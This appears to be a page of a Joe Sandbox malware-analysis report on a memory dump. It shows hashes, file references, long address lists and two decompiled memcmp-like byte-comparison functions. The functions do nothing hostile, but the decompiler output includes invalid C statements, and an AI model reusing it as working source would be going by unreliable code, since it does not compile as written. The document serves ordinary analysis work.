0x00e8132b
0x00e81312
0x00e8131b
0x00000000
0x00000000
0x00000000
0x00e8131b
0x00e812f0
0x00e812f9
0x00000000
0x00000000
0x00000000
0x00e812f9
0x00e812ce
0x00e812d7
0x00000000
0x00000000
0x00000000
0x00e81224
0x00e81228
0x00e8122c
0x00e8122e
0x00e81246
0x00e81246
0x00e8124e
0x00e81250
0x00e81268
0x00e81268
0x00e81270
0x00e81272
0x00e8128a
0x00e8128a
0x00e81292
0x00e81294
0x00e8129d
0x00e8129d
0x00000000
0x00e81294
0x00e81278
0x00e8127b
0x00e81284
0x00000000
0x00000000
0x00000000
0x00e81284
0x00e81256
0x00e81259
0x00e81262
0x00000000
0x00000000
0x00000000
0x00e81262
0x00e81234
0x00e81237
0x00e81240
0x00000000
0x00000000
0x00000000
0x00e81240
0x00e809a6
0x00e809a6
0x00e81797

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 53561e3250de785a8265c93ff478a83fbb9ec62e0209065e3eaadd2515b40252
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: D7C1D0322050930BEB6D563A853043FBAA55AE27B530A27ADD4FFDB0D5FE20C529D720

Uniqueness

Uniqueness Score: -1.00%

Function 00E809AE Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E809AE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x00e809ae
0x00e809ae
0x00e809b4
0x00e80a2b
0x00e80a2d
0x00e80a2f
0x00000000
0x00000000
0x00e80a35
0x00e80a3b
0x00e80ac2
0x00e80ac4
0x00e80ac6
0x00000000
0x00000000
0x00e80acc
0x00e80ad2
0x00e80b59
0x00e80b5b
0x00e80b5d
0x00000000
0x00000000
0x00e80b63
0x00e80b69
0x00e80bf0
0x00e80bf2
0x00e80bf4
0x00000000
0x00000000
0x00e80bfa
0x00e80c00
0x00e80c87
0x00e80c89
0x00e80c8b
0x00000000
0x00000000
0x00e80c97
0x00e80d1f
0x00e80d21
0x00e80d23
0x00000000
0x00000000
0x00e80d29
0x00e80d2f
0x00e80db6
0x00e80db8
0x00e80dba
0x00e80dc8
0x00e80dca
0x00e80dd7
0x00e80dd7
0x00e80dca
0x00000000
0x00e80dba
0x00e80d3c
0x00e80d3e
0x00e80d56
0x00e80d5e
0x00e80d60
0x00e80d78
0x00e80d80
0x00e80d82
0x00e80d9a
0x00e80da2
0x00e80da4
0x00e80dad
0x00e80dad
0x00000000
0x00e80da4
0x00e80d8b
0x00e80d94
0x00000000
0x00000000
0x00000000
0x00e80d94
0x00e80d69
0x00e80d72
0x00000000
0x00000000
0x00000000
0x00e80d72
0x00e80d47
0x00e80d50
0x00000000
0x00000000
0x00000000
0x00e80d50
0x00e80ca5
0x00e80ca7
0x00e80cbf
0x00e80cc7
0x00e80cc9
0x00e80ce1
0x00e80ce9
0x00e80ceb
0x00e80d03
0x00e80d0b
0x00e80d0d
0x00e80d16
0x00e80d16
0x00000000
0x00e80d0d
0x00e80cf4
0x00e80cfd
0x00000000
0x00000000
0x00000000
0x00e80cfd
0x00e80cd2
0x00e80cdb
0x00000000
0x00000000
0x00000000
0x00e80cdb
0x00e80cb0
0x00e80cb9
0x00000000
0x00000000
0x00000000
0x00e80cb9
0x00e80c0d
0x00e80c0f
0x00e80c27
0x00e80c2f
0x00e80c31
0x00e80c49
0x00e80c51
0x00e80c53
0x00e80c6b
0x00e80c73
0x00e80c75
0x00e80c7e
0x00e80c7e
0x00000000
0x00e80c75
0x00e80c5c
0x00e80c65
0x00000000
0x00000000
0x00000000
0x00e80c65
0x00e80c3a
0x00e80c43
0x00000000
0x00000000
0x00000000
0x00e80c43
0x00e80c18
0x00e80c21
0x00000000
0x00000000
0x00000000
0x00e80c21
0x00e80b76
0x00e80b78
0x00e80b90
0x00e80b98
0x00e80b9a
0x00e80bb2
0x00e80bba
0x00e80bbc
0x00e80bd4
0x00e80bdc
0x00e80bde
0x00e80be7
0x00e80be7
0x00000000
0x00e80bde
0x00e80bc5
0x00e80bce
0x00000000
0x00000000
0x00000000
0x00e80bce
0x00e80ba3
0x00e80bac
0x00000000
0x00000000
0x00000000
0x00e80bac
0x00e80b81
0x00e80b8a
0x00000000
0x00000000
0x00000000
0x00e80b8a
0x00e80adf
0x00e80ae1
0x00e80af9
0x00e80b01
0x00e80b03
0x00e80b1b
0x00e80b23
0x00e80b25
0x00e80b3d
0x00e80b45
0x00e80b47
0x00e80b50
0x00e80b50
0x00000000
0x00e80b47
0x00e80b2e
0x00e80b37
0x00000000
0x00000000
0x00000000
0x00e80b37
0x00e80b0c
0x00e80b15
0x00000000
0x00000000
0x00000000
0x00e80b15
0x00e80aea
0x00e80af3
0x00000000
0x00000000
0x00000000
0x00e80af3
0x00e80a48
0x00e80a4a
0x00e80a62
0x00e80a6a
0x00e80a6c
0x00e80a84
0x00e80a8c
0x00e80a8e
0x00e80aa6
0x00e80aae
0x00e80ab0
0x00e80ab9
0x00e80ab9
0x00000000
0x00e80ab0
0x00e80a97
0x00e80aa0
0x00000000
0x00000000
0x00000000
0x00e80aa0
0x00e80a75
0x00e80a7e
0x00000000
0x00000000
0x00000000
0x00e80a7e
0x00e80a53
0x00e80a5c
0x00000000
0x00000000
0x00000000
0x00e809b6
0x00e809b6
0x00e809bd
0x00e809bf
0x00e809d3
0x00e809d3
0x00e809db
0x00e809dd
0x00e809f1
0x00e809f1
0x00e809f9
0x00e809fb
0x00e80a0f
0x00e80a0f
0x00e80a17
0x00e80a19
0x00e80a22
0x00e80a22
0x00000000
0x00e80a19
0x00e80a01
0x00e80a04
0x00e80a0d
0x00000000
0x00000000
0x00000000
0x00e80a0d
0x00e809e3
0x00e809e6
0x00e809ef
0x00000000
0x00000000
0x00000000
0x00e809ef
0x00e809c5
0x00e809c8
0x00e809d1
0x00000000
0x00000000
0x00000000
0x00e809d1
0x00e809a6
0x00e809a6
0x00e81797

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: b2004621c0f381ea5e24771b897aa37a6cef6dae7443a27d1033937a69f2c4e9
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: F5C1C2322051930BEFAD5639853043FBAA05AE27B531A27ADD4FEEB1D5FE20C528D710

Uniqueness

Uniqueness Score: -1.00%

Function 00E80596 Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E80596(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x00e80596
0x00e80596
0x00e80596
0x00e8059c
0x00e80623
0x00e80625
0x00e80627
0x00e809a6
0x00e809a6
0x00e81797
0x00e81797
0x00e8062d
0x00e80633
0x00e806ba
0x00e806bc
0x00e806be
0x00000000
0x00000000
0x00e806c4
0x00e806ca
0x00e80751
0x00e80753
0x00e80755
0x00000000
0x00000000
0x00e8075b
0x00e80761
0x00e807e8
0x00e807ea
0x00e807ec
0x00000000
0x00000000
0x00e807f8
0x00e80880
0x00e80882
0x00e80884
0x00000000
0x00000000
0x00e8088a
0x00e80890
0x00e80917
0x00e80919
0x00e8091b
0x00000000
0x00000000
0x00e80921
0x00e80927
0x00e8099e
0x00e809a0
0x00e809a2
0x00e809a4
0x00e809a4
0x00000000
0x00e809a2
0x00e80930
0x00e80932
0x00e80946
0x00e8094e
0x00e80950
0x00e80964
0x00e8096c
0x00e8096e
0x00e80982
0x00e8098a
0x00e8098c
0x00e80995
0x00e80995
0x00000000
0x00e8098c
0x00e80977
0x00e80980
0x00000000
0x00000000
0x00000000
0x00e80980
0x00e80959
0x00e80962
0x00000000
0x00000000
0x00000000
0x00e80962
0x00e8093b
0x00e80944
0x00000000
0x00000000
0x00000000
0x00e80944
0x00e8089d
0x00e8089f
0x00e808b7
0x00e808bf
0x00e808c1
0x00e808d9
0x00e808e1
0x00e808e3
0x00e808fb
0x00e80903
0x00e80905
0x00e8090e
0x00e8090e
0x00000000
0x00e80905
0x00e808ec
0x00e808f5
0x00000000
0x00000000
0x00000000
0x00e808f5
0x00e808ca
0x00e808d3
0x00000000
0x00000000
0x00000000
0x00e808d3
0x00e808a8
0x00e808b1
0x00000000
0x00000000
0x00000000
0x00e808b1
0x00e80806
0x00e80808
0x00e80820
0x00e80828
0x00e8082a
0x00e80842
0x00e8084a
0x00e8084c
0x00e80864
0x00e8086c
0x00e8086e
0x00e80877
0x00e80877
0x00000000
0x00e8086e
0x00e80855
0x00e8085e
0x00000000
0x00000000
0x00000000
0x00e8085e
0x00e80833
0x00e8083c
0x00000000
0x00000000
0x00000000
0x00e8083c
0x00e80811
0x00e8081a
0x00000000
0x00000000
0x00000000
0x00e8081a
0x00e8076e
0x00e80770
0x00e80788
0x00e80790
0x00e80792
0x00e807aa
0x00e807b2
0x00e807b4
0x00e807cc
0x00e807d4
0x00e807d6
0x00e807df
0x00e807df
0x00000000
0x00e807d6
0x00e807bd
0x00e807c6
0x00000000
0x00000000
0x00000000
0x00e807c6
0x00e8079b
0x00e807a4
0x00000000
0x00000000
0x00000000
0x00e807a4
0x00e80779
0x00e80782
0x00000000
0x00000000
0x00000000
0x00e80782
0x00e806d7
0x00e806d9
0x00e806f1
0x00e806f9
0x00e806fb
0x00e80713
0x00e8071b
0x00e8071d
0x00e80735
0x00e8073d
0x00e8073f
0x00e80748
0x00e80748
0x00000000
0x00e8073f
0x00e80726
0x00e8072f
0x00000000
0x00000000
0x00000000
0x00e8072f
0x00e80704
0x00e8070d
0x00000000
0x00000000
0x00000000
0x00e8070d
0x00e806e2
0x00e806eb
0x00000000
0x00000000
0x00000000
0x00e806eb
0x00e80640
0x00e80642
0x00e8065a
0x00e80662
0x00e80664
0x00e8067c
0x00e80684
0x00e80686
0x00e8069e
0x00e806a6
0x00e806a8
0x00e806b1
0x00e806b1
0x00000000
0x00e806a8
0x00e8068f
0x00e80698
0x00000000
0x00000000
